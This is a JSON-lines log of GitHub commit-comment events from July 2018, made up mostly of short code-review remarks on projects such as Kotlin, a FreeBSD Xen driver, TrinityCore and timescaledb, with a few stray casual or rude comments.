{"id":"7983450847","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750873,"position":60,"line":155,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/QualifiedExpressionResolver.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:45:22Z","updated_at":"2018-07-18T14:45:22Z","author_association":"MEMBER","body":"Do you mean that it'd better if it was `if (expresssion != null) return`?"}},"created_at":"2018-07-18T14:45:22Z"}
{"id":"7983453308","type":"CommitCommentEvent","actor":{"login":"parthaccorin"},"repo":{"name":"bazaarvoice/magento2-extension"},"payload":{"comment":{"id":29750882,"position":34,"line":51,"path":"Model/Feed/Product/Generic.php","commit_id":"c8d8bace38be69d583a9556f43f557015c74621f","created_at":"2018-07-18T14:45:44Z","updated_at":"2018-07-18T14:45:44Z","author_association":"NONE","body":"This throws an error on compilation, as it's removed from here but not from its child file.\r\n```\r\nExtra parameters passed to parent construct: $objectManager. File: /var/www/html/dev6-vortex.accorin.us/vendor/bazaarvoice/bazaarvoice-magento2-ext/Model/Feed/Product/Category.php\r\nTotal Errors Count: 1\r\n```"}},"created_at":"2018-07-18T14:45:44Z"}
{"id":"7983454434","type":"CommitCommentEvent","actor":{"login":"stewstar"},"repo":{"name":"Songbz1999/pythonForFinance"},"payload":{"comment":{"id":29750884,"position":26,"line":40,"path":"lesson3/python_connect_pgsql.py","commit_id":"21171ac832a325a8f0fdef79c53deeca1f207799","created_at":"2018-07-18T14:45:55Z","updated_at":"2018-07-18T14:45:55Z","author_association":"NONE","body":"use all lowercase for table name and fields"}},"created_at":"2018-07-18T14:45:55Z"}
{"id":"7983456964","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750891,"position":66,"line":96,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/lazy/LazyImportScope.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:46:17Z","updated_at":"2018-07-18T14:46:17Z","author_association":"MEMBER","body":"Agree, will try to leave `KtImportDirective`"}},"created_at":"2018-07-18T14:46:17Z"}
{"id":"7983458217","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750893,"position":209,"line":209,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:46:28Z","updated_at":"2018-07-18T14:46:28Z","author_association":"NONE","body":"s/xentag->parent/parent/"}},"created_at":"2018-07-18T14:46:28Z"}
{"id":"7983458464","type":"CommitCommentEvent","actor":{"login":"stewstar"},"repo":{"name":"Songbz1999/pythonForFinance"},"payload":{"comment":{"id":29750896,"position":27,"line":41,"path":"lesson3/python_connect_pgsql.py","commit_id":"21171ac832a325a8f0fdef79c53deeca1f207799","created_at":"2018-07-18T14:46:30Z","updated_at":"2018-07-18T14:46:30Z","author_association":"NONE","body":"id BIGSERIAL PRIMARY KEY,"}},"created_at":"2018-07-18T14:46:30Z"}
{"id":"7983460160","type":"CommitCommentEvent","actor":{"login":"GaurangTandon"},"repo":{"name":"GaurangTandon/ProKeys"},"payload":{"comment":{"id":29750900,"position":null,"line":null,"path":null,"commit_id":"c63d351b688c752dbfaccbedaafbd93efb65bb9b","created_at":"2018-07-18T14:46:46Z","updated_at":"2018-07-18T14:46:46Z","author_association":"OWNER","body":"fixes #34"}},"created_at":"2018-07-18T14:46:46Z"}
{"id":"7983462710","type":"CommitCommentEvent","actor":{"login":"stewstar"},"repo":{"name":"Songbz1999/pythonForFinance"},"payload":{"comment":{"id":29750906,"position":27,"line":41,"path":"lesson3/python_connect_pgsql.py","commit_id":"21171ac832a325a8f0fdef79c53deeca1f207799","created_at":"2018-07-18T14:47:09Z","updated_at":"2018-07-18T14:47:09Z","author_association":"NONE","body":"date -> pricing_date DATE NOT NULL,"}},"created_at":"2018-07-18T14:47:09Z"}
{"id":"7983468313","type":"CommitCommentEvent","actor":{"login":"stewstar"},"repo":{"name":"Songbz1999/pythonForFinance"},"payload":{"comment":{"id":29750920,"position":27,"line":41,"path":"lesson3/python_connect_pgsql.py","commit_id":"21171ac832a325a8f0fdef79c53deeca1f207799","created_at":"2018-07-18T14:48:00Z","updated_at":"2018-07-18T14:48:00Z","author_association":"NONE","body":"open REAL NOT NULL,"}},"created_at":"2018-07-18T14:48:00Z"}
{"id":"7983471060","type":"CommitCommentEvent","actor":{"login":"Alkarex"},"repo":{"name":"Chocobozzz/PeerTube"},"payload":{"comment":{"id":29750925,"position":null,"line":null,"path":null,"commit_id":"2e0752b8c013b7bffa762826f8b3625307bb52d9","created_at":"2018-07-18T14:48:24Z","updated_at":"2018-07-18T14:48:24Z","author_association":"NONE","body":"👍 \r\nJust for the record: https://www.kisskissbankbank.com/projects/peertube-a-free-and-federated-video-platform/"}},"created_at":"2018-07-18T14:48:24Z"}
{"id":"7983471448","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750927,"position":95,"line":118,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/lazy/LazyImportScope.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:48:28Z","updated_at":"2018-07-18T14:48:28Z","author_association":"MEMBER","body":"Unfortunately, `KotlinLookupLocation` is not available from `compiler` module :("}},"created_at":"2018-07-18T14:48:28Z"}
{"id":"7983471591","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750928,"position":258,"line":258,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:48:29Z","updated_at":"2018-07-18T14:48:29Z","author_association":"NONE","body":"Maybe you should check this before calling bus_dmamap_destroy and return EBUSY?"}},"created_at":"2018-07-18T14:48:29Z"}
{"id":"7983481232","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29750954,"position":null,"line":null,"path":null,"commit_id":"f7466c28a5f2c2acd2669991cb3a666c997aafab","created_at":"2018-07-18T14:49:55Z","updated_at":"2018-07-18T14:49:55Z","author_association":"MEMBER","body":"scriptname was not enough?\r\neither way, typeid requires <type_info> to be included and returns mangled name on gcc/clang (`boost::core::demangle`)"}},"created_at":"2018-07-18T14:49:55Z"}
{"id":"7983482780","type":"CommitCommentEvent","actor":{"login":"slammajamma28"},"repo":{"name":"DouglasKGlover/PSTCTL_V2"},"payload":{"comment":{"id":29750959,"position":null,"line":null,"path":null,"commit_id":"7e552a274a2d9a1bd91aea387536ceb846a52e7c","created_at":"2018-07-18T14:50:11Z","updated_at":"2018-07-18T14:50:11Z","author_association":"NONE","body":"What in the... I swear it worked locally when I tested it!! This upsets me greatly."}},"created_at":"2018-07-18T14:50:11Z"}
{"id":"7983492796","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29750986,"position":null,"line":null,"path":null,"commit_id":"f7466c28a5f2c2acd2669991cb3a666c997aafab","created_at":"2018-07-18T14:51:41Z","updated_at":"2018-07-18T14:51:41Z","author_association":"MEMBER","body":"scriptname doesn't account for various things\r\n* Factory AI types\r\n* Pets getting overridden\r\n* Summons getting overridden by their summoner's AI"}},"created_at":"2018-07-18T14:51:41Z"}
{"id":"7983493708","type":"CommitCommentEvent","actor":{"login":"fscoto"},"repo":{"name":"LoupVaillant/Monocypher"},"payload":{"comment":{"id":29750987,"position":4,"line":1275,"path":"src/monocypher.c","commit_id":"95dd2bed67fb566202ffbb79db1b570bd18674b2","created_at":"2018-07-18T14:51:49Z","updated_at":"2018-07-18T14:51:49Z","author_association":"CONTRIBUTOR","body":"Would it be worth declaring this `static inline int`? It may only be a hint to the compiler, but [it may make a difference on some](https://blog.tartanllama.xyz/inline-hints/)."}},"created_at":"2018-07-18T14:51:49Z"}
{"id":"7983498034","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750997,"position":266,"line":266,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:52:27Z","updated_at":"2018-07-18T14:52:27Z","author_association":"NONE","body":"This looks very similar to xen_bus_dmamap_create, I wonder if there's someway to avoid the duplication."}},"created_at":"2018-07-18T14:52:27Z"}
{"id":"7983498565","type":"CommitCommentEvent","actor":{"login":"acmacm"},"repo":{"name":"ietf-ippm/meeting-materials"},"payload":{"comment":{"id":29750999,"position":null,"line":null,"path":null,"commit_id":"7106a8485b637b2582319afa8d090d9cf059874d","created_at":"2018-07-18T14:52:31Z","updated_at":"2018-07-18T14:52:31Z","author_association":"CONTRIBUTOR","body":"[Route_Metric-July2018.pdf](https://github.com/ietf-ippm/meeting-materials/files/2206245/Route_Metric-July2018.pdf)\r\n"}},"created_at":"2018-07-18T14:52:31Z"}
{"id":"7983500636","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751002,"position":304,"line":304,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:52:50Z","updated_at":"2018-07-18T14:52:50Z","author_association":"NONE","body":"Same here, won't retuning EBUSY be better?"}},"created_at":"2018-07-18T14:52:50Z"}
{"id":"7983500763","type":"CommitCommentEvent","actor":{"login":"janxious"},"repo":{"name":"Instrumental/instrumental_agent-node"},"payload":{"comment":{"id":29751003,"position":14,"line":19,"path":"test/intrumental-test.js","commit_id":"d277840524061164610cafc7230e45eb153fd442","created_at":"2018-07-18T14:52:51Z","updated_at":"2018-07-18T14:52:51Z","author_association":"MEMBER","body":"It will definitely feel clever until node 11 comes out. 🙃"}},"created_at":"2018-07-18T14:52:51Z"}
{"id":"7983507436","type":"CommitCommentEvent","actor":{"login":"erimatnor"},"repo":{"name":"Ngalstyan4/timescaledb"},"payload":{"comment":{"id":29751010,"position":104,"line":104,"path":"src/ddl_utils.c","commit_id":"13073d210c2bffec9a0bd4722d796a3684816faa","created_at":"2018-07-18T14:53:51Z","updated_at":"2018-07-18T14:53:51Z","author_association":"NONE","body":"I am not sure you need the `hypertable_get_all` here since in the case of no hypertable you can just scan the `chunk` table and list all entries (e.g., using a `chunk_find_all()` instead of `chunks_find_all_in_range()`. \r\n\r\nI guess one downside is that this creates two code paths: one for given hypertable and one for no hypertable. But the get-all-chunks scan should be pretty simple.\r\n"}},"created_at":"2018-07-18T14:53:51Z"}
{"id":"7983508877","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29751014,"position":null,"line":null,"path":null,"commit_id":"f7466c28a5f2c2acd2669991cb3a666c997aafab","created_at":"2018-07-18T14:54:03Z","updated_at":"2018-07-18T14:54:03Z","author_association":"MEMBER","body":"second point still stands"}},"created_at":"2018-07-18T14:54:03Z"}
{"id":"7983511080","type":"CommitCommentEvent","actor":{"login":"wxcafe"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29751019,"position":null,"line":null,"path":null,"commit_id":"f0ac83179f30c669bb15d4140521f17da9108bd5","created_at":"2018-07-18T14:54:23Z","updated_at":"2018-07-18T14:54:23Z","author_association":"NONE","body":"🙏 thanks"}},"created_at":"2018-07-18T14:54:23Z"}
{"id":"7983513318","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751025,"position":337,"line":337,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:54:43Z","updated_at":"2018-07-18T14:54:43Z","author_association":"NONE","body":"I wonder why you have a 'refs' local variable if you end up using xenmap->refs directly."}},"created_at":"2018-07-18T14:54:43Z"}
{"id":"7983515556","type":"CommitCommentEvent","actor":{"login":"erimatnor"},"repo":{"name":"Ngalstyan4/timescaledb"},"payload":{"comment":{"id":29751030,"position":29,"line":29,"path":"src/ddl_utils.c","commit_id":"13073d210c2bffec9a0bd4722d796a3684816faa","created_at":"2018-07-18T14:55:02Z","updated_at":"2018-07-18T14:55:02Z","author_association":"NONE","body":"This looks largely correct, but has a bunch of formatting and style issues that I am not going to comment on now."}},"created_at":"2018-07-18T14:55:02Z"}
{"id":"7983519587","type":"CommitCommentEvent","actor":{"login":"acmacm"},"repo":{"name":"ietf-ippm/meeting-materials"},"payload":{"comment":{"id":29751038,"position":null,"line":null,"path":null,"commit_id":"acb90a181c1de3a8db06620f121c662aeb6c59cd","created_at":"2018-07-18T14:55:35Z","updated_at":"2018-07-18T14:55:35Z","author_association":"CONTRIBUTOR","body":"[Route_Metric-July2018.pdf](https://github.com/ietf-ippm/meeting-materials/files/2206256/Route_Metric-July2018.pdf)\r\n"}},"created_at":"2018-07-18T14:55:35Z"}
{"id":"7983526429","type":"CommitCommentEvent","actor":{"login":"albertpai"},"repo":{"name":"albertpai/Kodflix"},"payload":{"comment":{"id":29751058,"position":3,"line":9,"path":"src/frontend/Poster/Poster.js","commit_id":"9d9a98775c0a52d727b9e7ffe81760fc84934fab","created_at":"2018-07-18T14:56:35Z","updated_at":"2018-07-18T14:56:35Z","author_association":"OWNER","body":"The following code has been removed.\r\n`onClick={ () => { this.scrollToTop(); }`"}},"created_at":"2018-07-18T14:56:35Z"}
{"id":"7983527808","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29751062,"position":27,"line":27,"path":"compiler/psi/src/org/jetbrains/kotlin/psi/KtImportInfo.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:56:47Z","updated_at":"2018-07-18T14:56:47Z","author_association":"MEMBER","body":"Nice catch, I will replace the single usage with `computeNameAsString()?.takeIf(CharSequence::isNotEmpty)?.let(Name::identifier)`"}},"created_at":"2018-07-18T14:56:47Z"}
{"id":"7983530387","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29751067,"position":38,"line":38,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T14:57:10Z","updated_at":"2018-07-18T14:57:10Z","author_association":"OWNER","body":"var b = 10;\r\nfunction divisão() {\r\n    b = b / 2;\r\n}\r\nb = 5\r\nb = 5;"}},"created_at":"2018-07-18T14:57:10Z"}
{"id":"7983532460","type":"CommitCommentEvent","actor":{"login":"mahdi-e"},"repo":{"name":"katerinabc/developer_sna"},"payload":{"comment":{"id":29751071,"position":34,"line":44,"path":"README.md","commit_id":"e128fed226170bdc4cc8d1583403d807c8b69d50","created_at":"2018-07-18T14:57:29Z","updated_at":"2018-07-18T14:57:29Z","author_association":"COLLABORATOR","body":"I still have problems in understanding the reason for having one artificial 22nd developer. Maybe it will be solved when I continue reviewing."}},"created_at":"2018-07-18T14:57:29Z"}
{"id":"7983533359","type":"CommitCommentEvent","actor":{"login":"kenneth558"},"repo":{"name":"kenneth558/plant_resistance_primary_perception"},"payload":{"comment":{"id":29751074,"position":null,"line":null,"path":null,"commit_id":"cf1f23119719734f879e71f3294efcd383371e4f","created_at":"2018-07-18T14:57:37Z","updated_at":"2018-07-18T14:57:37Z","author_association":"OWNER","body":"TODO: debug adjust_values_for_this_leg()"}},"created_at":"2018-07-18T14:57:37Z"}
{"id":"7983535344","type":"CommitCommentEvent","actor":{"login":"kenneth558"},"repo":{"name":"kenneth558/plant_resistance_primary_perception"},"payload":{"comment":{"id":29751081,"position":null,"line":null,"path":null,"commit_id":"cf1f23119719734f879e71f3294efcd383371e4f","created_at":"2018-07-18T14:57:54Z","updated_at":"2018-07-18T14:57:54Z","author_association":"OWNER","body":"//TODO: debug adjust_values_for_this_leg() as it sets the pot values out of range"}},"created_at":"2018-07-18T14:57:54Z"}
{"id":"7983537382","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29751084,"position":null,"line":null,"path":null,"commit_id":"85ddca67e32a8e2a143f9101b55c68ca5b76f62e","created_at":"2018-07-18T14:58:10Z","updated_at":"2018-07-18T14:58:10Z","author_association":"NONE","body":"I can't reproduce any of these warnings with any of:\r\n\r\n```\r\nCFLAGS=\"-Wall -Wextra -Wunused-parameter -Wlogical-not-parentheses\" CC=clang++-6.0 ./configure && make clean && make\r\nCFLAGS=\"-Wall -Wextra -Wunused-parameter -Wlogical-not-parentheses\" CC=clang-6.0 ./configure && make clean && make\r\nCFLAGS=\"-Wall -Wextra -Wunused-parameter -Wlogical-not-parentheses\" CC=clang++ ./configure && make clean && make\r\nCFLAGS=\"-Wall -Wextra -Wunused-parameter -Wlogical-not-parentheses\" CC=clang ./configure && make clean && make\r\n```\r\n\r\nSo I'm not convinced this is needed.\r\n\r\nAlso, moving the single common parenthesis from the macro definition out to each macro call site seems a backward step to me."}},"created_at":"2018-07-18T14:58:10Z"}
{"id":"7983537452","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751085,"position":339,"line":339,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:58:11Z","updated_at":"2018-07-18T14:58:11Z","author_association":"NONE","body":"You can use atop(segs[i].ds_addr) which is slightly more compact."}},"created_at":"2018-07-18T14:58:11Z"}
{"id":"7983539824","type":"CommitCommentEvent","actor":{"login":"ericfranz"},"repo":{"name":"OSC/ood-myjobs"},"payload":{"comment":{"id":29751088,"position":null,"line":null,"path":null,"commit_id":"8a4f481f27901c5aa41eaff086bcc13c823d035c","created_at":"2018-07-18T14:58:30Z","updated_at":"2018-07-18T14:58:30Z","author_association":"CONTRIBUTOR","body":"Redo this commit to not add the `db/schema.rb` change. You can do rebase on this commit and mark the rebase as \"change\". Then push the fixed branch up (will need force, so make sure you are pushing your branch and not another i.e. git push origin add_logging -f). https://www.atlassian.com/git/tutorials/rewriting-history/git-rebase"}},"created_at":"2018-07-18T14:58:30Z"}
{"id":"7983540394","type":"CommitCommentEvent","actor":{"login":"erimatnor"},"repo":{"name":"Ngalstyan4/timescaledb"},"payload":{"comment":{"id":29751090,"position":1,"line":1,"path":"src/ddl_utils.c","commit_id":"13073d210c2bffec9a0bd4722d796a3684816faa","created_at":"2018-07-18T14:58:35Z","updated_at":"2018-07-18T14:58:35Z","author_association":"NONE","body":"I think we should probably just put most of this code in `chunk.c` because we haven't put other DDL commands in specific `.c` files. For instance, `create_hypertable()` is in `hypertable.c`, `add_dimension()` is in `dimension.c`, `tablespace_show()` is in `tablespace.c, and so forth."}},"created_at":"2018-07-18T14:58:35Z"}
{"id":"7983541135","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751091,"position":342,"line":342,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:58:42Z","updated_at":"2018-07-18T14:58:42Z","author_association":"NONE","body":"I don't think you need the parentheses around xentag->common.lockfunc."}},"created_at":"2018-07-18T14:58:42Z"}
{"id":"7983542685","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751094,"position":344,"line":344,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:58:55Z","updated_at":"2018-07-18T14:58:55Z","author_association":"NONE","body":"Same here about parentheses."}},"created_at":"2018-07-18T14:58:55Z"}
{"id":"7983543339","type":"CommitCommentEvent","actor":{"login":"Stevearzh"},"repo":{"name":"Stevearzh/Avalon"},"payload":{"comment":{"id":29751097,"position":null,"line":null,"path":null,"commit_id":"8505c237c326eb95f38ce9ba0fdbcf24c47df416","created_at":"2018-07-18T14:59:01Z","updated_at":"2018-07-18T14:59:01Z","author_association":"OWNER","body":"@BruceZhang1993 "}},"created_at":"2018-07-18T14:59:01Z"}
{"id":"7983546796","type":"CommitCommentEvent","actor":{"login":"techthreads"},"repo":{"name":"ThreadsStyling/tslint"},"payload":{"comment":{"id":29751107,"position":null,"line":null,"path":null,"commit_id":"04c82aba2a9626470f9e2db7baa0e3577ea40c09","created_at":"2018-07-18T14:59:31Z","updated_at":"2018-07-18T14:59:31Z","author_association":"NONE","body":"Build version: __`3.1.0-fix-warnings.16`__ :crossed_fingers: [`fix-warnings`](https://github.com/ThreadsStyling/tslint/tree/fix-warnings) on [*CircleCI*](https://circleci.com/gh/ThreadsStyling/tslint/16) :tada:"}},"created_at":"2018-07-18T14:59:31Z"}
{"id":"7983547538","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751111,"position":24,"line":24,"path":"google/cloud/iam_binding.h","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T14:59:37Z","updated_at":"2018-07-18T14:59:37Z","author_association":"NONE","body":"In general your classes are missing documentation."}},"created_at":"2018-07-18T14:59:37Z"}
{"id":"7983548632","type":"CommitCommentEvent","actor":{"login":"HunterOfBugs"},"repo":{"name":"blizma/Psychic"},"payload":{"comment":{"id":29751112,"position":null,"line":null,"path":null,"commit_id":"b50ca361d3f5ad930270cd1ac3c8d075e5dbd932","created_at":"2018-07-18T14:59:47Z","updated_at":"2018-07-18T14:59:47Z","author_association":"NONE","body":"Ur such a idiot"}},"created_at":"2018-07-18T14:59:47Z"}
{"id":"7983552810","type":"CommitCommentEvent","actor":{"login":"jatangne"},"repo":{"name":"jatangne/jatangne.github.io"},"payload":{"comment":{"id":29751128,"position":null,"line":null,"path":null,"commit_id":"cd0580e9978cb44fab634c795aa7d2b97c281694","created_at":"2018-07-18T15:00:22Z","updated_at":"2018-07-18T15:00:22Z","author_association":"OWNER","body":"go back"}},"created_at":"2018-07-18T15:00:22Z"}
{"id":"7983554489","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29751131,"position":null,"line":null,"path":null,"commit_id":"daceeb229fec97fdb19ac93bd0c77664b295b00f","created_at":"2018-07-18T15:00:37Z","updated_at":"2018-07-18T15:00:37Z","author_association":"NONE","body":"As with https://github.com/perlpunk/libyaml/commit/85ddca67e32a8e2a143f9101b55c68ca5b76f62e i'm not convinced its needed, because I can't reproduce these warnings."}},"created_at":"2018-07-18T15:00:37Z"}
{"id":"7983554857","type":"CommitCommentEvent","actor":{"login":"albertpai"},"repo":{"name":"albertpai/Kodflix"},"payload":{"comment":{"id":29751132,"position":12,"line":7,"path":"src/backend/app.js","commit_id":"9d9a98775c0a52d727b9e7ffe81760fc84934fab","created_at":"2018-07-18T15:00:40Z","updated_at":"2018-07-18T15:00:40Z","author_association":"OWNER","body":"https://github.com/rmallols/kodflix/issues/22"}},"created_at":"2018-07-18T15:00:40Z"}
{"id":"7983555438","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751133,"position":375,"line":375,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:00:45Z","updated_at":"2018-07-18T15:00:45Z","author_association":"NONE","body":"If you KASSERT that xenmap->refs == NULL, *op.segp will always be -1?"}},"created_at":"2018-07-18T15:00:45Z"}
{"id":"7983557211","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751135,"position":33,"line":33,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:01:01Z","updated_at":"2018-07-18T15:01:01Z","author_association":"NONE","body":"Can you move these?"}},"created_at":"2018-07-18T15:01:01Z"}
{"id":"7983558888","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751139,"position":381,"line":381,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:01:15Z","updated_at":"2018-07-18T15:01:15Z","author_association":"NONE","body":"Coding style doesn't allow variable declaration + initialisation at the same time."}},"created_at":"2018-07-18T15:01:15Z"}
{"id":"7983558952","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29751140,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-18T15:01:16Z","updated_at":"2018-07-18T15:01:16Z","author_association":"MEMBER","body":"Now you can cleanup dm7020hdv2 separate build files using https://github.com/PLi-metas/pli-extras/blob/develop/cleanup-build.sh ;)"}},"created_at":"2018-07-18T15:01:16Z"}
{"id":"7983561217","type":"CommitCommentEvent","actor":{"login":"ctzsnooze"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29751144,"position":11,"line":50,"path":"src/main/sensors/gyroanalyse.c","commit_id":"226e491e119e4fb9b4f7f4aa3295f54a88516008","created_at":"2018-07-18T15:01:36Z","updated_at":"2018-07-18T15:01:36Z","author_association":"OWNER","body":"Yes, good idea - done!"}},"created_at":"2018-07-18T15:01:36Z"}
{"id":"7983564205","type":"CommitCommentEvent","actor":{"login":"wonyong0928"},"repo":{"name":"MinTDe/KAKAOTLAK"},"payload":{"comment":{"id":29751150,"position":null,"line":null,"path":null,"commit_id":"832210b147a5415d005d3540350730779e9fcc99","created_at":"2018-07-18T15:02:02Z","updated_at":"2018-07-18T15:02:02Z","author_association":"COLLABORATOR","body":"dfasfdsafds"}},"created_at":"2018-07-18T15:02:02Z"}
{"id":"7983568530","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751158,"position":40,"line":40,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:02:41Z","updated_at":"2018-07-18T15:02:41Z","author_association":"NONE","body":"Move?\r\n"}},"created_at":"2018-07-18T15:02:41Z"}
{"id":"7983568960","type":"CommitCommentEvent","actor":{"login":"ArjunDandagi"},"repo":{"name":"anubc777/30days-of-code2"},"payload":{"comment":{"id":29751159,"position":null,"line":null,"path":null,"commit_id":"870146b76b715bf862ceb0d7e06b8c7853b675ec","created_at":"2018-07-18T15:02:45Z","updated_at":"2018-07-18T15:02:45Z","author_association":"NONE","body":"Hi, \r\nas long as you are marking the class name as public, you can not have the filename and class name as different \r\n\r\nplease look at this link for more clarity \r\nhttps://stackoverflow.com/questions/1841847/can-i-compile-a-java-file-with-a-different-name-than-the-class"}},"created_at":"2018-07-18T15:02:45Z"}
{"id":"7983570188","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751165,"position":404,"line":404,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:02:57Z","updated_at":"2018-07-18T15:02:57Z","author_association":"NONE","body":"Hm, I'm not sure I understand why you need a NOLOAD option."}},"created_at":"2018-07-18T15:02:57Z"}
{"id":"7983570284","type":"CommitCommentEvent","actor":{"login":"ricaragao"},"repo":{"name":"meteor/simple-todos"},"payload":{"comment":{"id":29751166,"position":3,"line":3,"path":"imports/ui/body.js","commit_id":"30e9ac16a2de85e74d5a6d92b16e41b37e7faf5e","created_at":"2018-07-18T15:02:57Z","updated_at":"2018-07-18T15:02:57Z","author_association":"NONE","body":"It is wrong path. It is : \r\n\r\n`import './../body.html';\r\n`"}},"created_at":"2018-07-18T15:02:57Z"}
{"id":"7983572783","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751172,"position":412,"line":412,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:03:19Z","updated_at":"2018-07-18T15:03:19Z","author_association":"NONE","body":"} else if (...) {"}},"created_at":"2018-07-18T15:03:19Z"}
{"id":"7983574826","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751177,"position":37,"line":37,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:03:39Z","updated_at":"2018-07-18T15:03:39Z","author_association":"NONE","body":"You can do an `insert` with an empty list of members first. That returns pair with the iterator pointing to the location of the insert and a boolean telling you if there was an item with that key already.\r\nThen you can take the right action based on the boolean, that saves you a lookup.\r\n\r\n"}},"created_at":"2018-07-18T15:03:39Z"}
